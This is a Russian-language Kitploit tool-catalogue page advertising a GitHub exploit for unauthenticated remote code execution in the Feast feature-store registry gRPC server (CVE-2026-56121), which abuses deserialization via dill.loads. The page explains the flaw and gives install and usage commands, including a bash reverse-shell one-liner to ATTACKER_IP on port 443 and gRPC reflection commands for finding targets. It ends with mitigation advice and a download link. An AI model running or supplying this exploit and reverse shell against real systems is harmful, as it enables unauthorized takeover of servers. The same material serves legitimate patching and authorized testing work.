Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/0xdak/cve-2026-56121_exploit
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеРазработка Полезной Нагрузки
GitHub0xdak/cve-2026-56121_exploit

CVE-2026-56121_exploit

Неаутентифицированный эксплойт RCE для gRPC-сервера реестра Feast (CVE-2026-56121) с использованием десериализации dill. Включает генерацию полезной нагрузки, поддержку reverse shell и идентификацию цели через gRPC reflection.

Репозиторий
121 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-56121 — Неаутентифицированный RCE в Feast Registry (dill.loads)

Неаутентифицированное удалённое выполнение кода в gRPC-сервере реестра хранилища признаков Feast.

RPC ApplyFeatureView пересобирает OnDemandFeatureView из proto-запроса. При этом он декодирует spec.user_defined_function.body из base64 и передаёт его в dill.loads() — до любой проверки авторизации. dill — надмножество pickle, поэтому объект, чей __reduce__ возвращает (os.system, (cmd,)), выполняет произвольную команду в тот момент, когда сервер его десериализует. В стандартном развёртывании используется , поэтому одного неаутентифицированного gRPC-запроса к порту реестра достаточно.

auth: no_auth
  • Затронуто: Feast < 0.63.0
  • Исправлено в: Feast 0.63.0
  • Порт по умолчанию: 6570 (gRPC реестра)
  • CWE: 502 (Десериализация недоверенных данных)
  • Воздействие: RCE от имени пользователя службы реестра (часто — всей управляющей плоскости хранилища признаков)

Требования

Эксплойт переиспользует собственные сгенерированные gRPC-протофайлы Feast, поэтому установите уязвимую версию Feast на стороне атакующего:

root@kitploit:~
python3 -m venv venv && . venv/bin/activate
pip install "feast==0.62.0" grpcio

Использование

root@kitploit:~
# quick check (output appears on the SERVER, not locally)
python3 exploit.py 10.10.10.10:6570 -c "id"

# reverse shell (bash -c wrapper: os.system uses /bin/sh, which lacks /dev/tcp)
python3 exploit.py 10.10.10.10:6570 -c 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1"'

-p/--project задаёт имя проекта (по умолчанию feature_repo). Вывод команды печатается в stdout/journal хоста реестра, поэтому используйте reverse shell или записывайте вывод в доступный для чтения путь, чтобы увидеть результаты.

Определение цели

В реестре включён gRPC reflection:

root@kitploit:~
grpcurl -plaintext 10.10.10.10:6570 list
# feast.registry.RegistryServer
# grpc.health.v1.Health
# grpc.reflection.v1alpha.ServerReflection

Устранение уязвимости

Обновитесь до Feast 0.63.0+, включите бэкенд аутентификации и никогда не открывайте gRPC-порт реестра для недоверенных сетей.

Отказ от ответственности

Только для авторизованного тестирования безопасности и обучения. Используйте его только против систем, которыми вы владеете или на тестирование которых имеете явное разрешение.

Скачать инструмент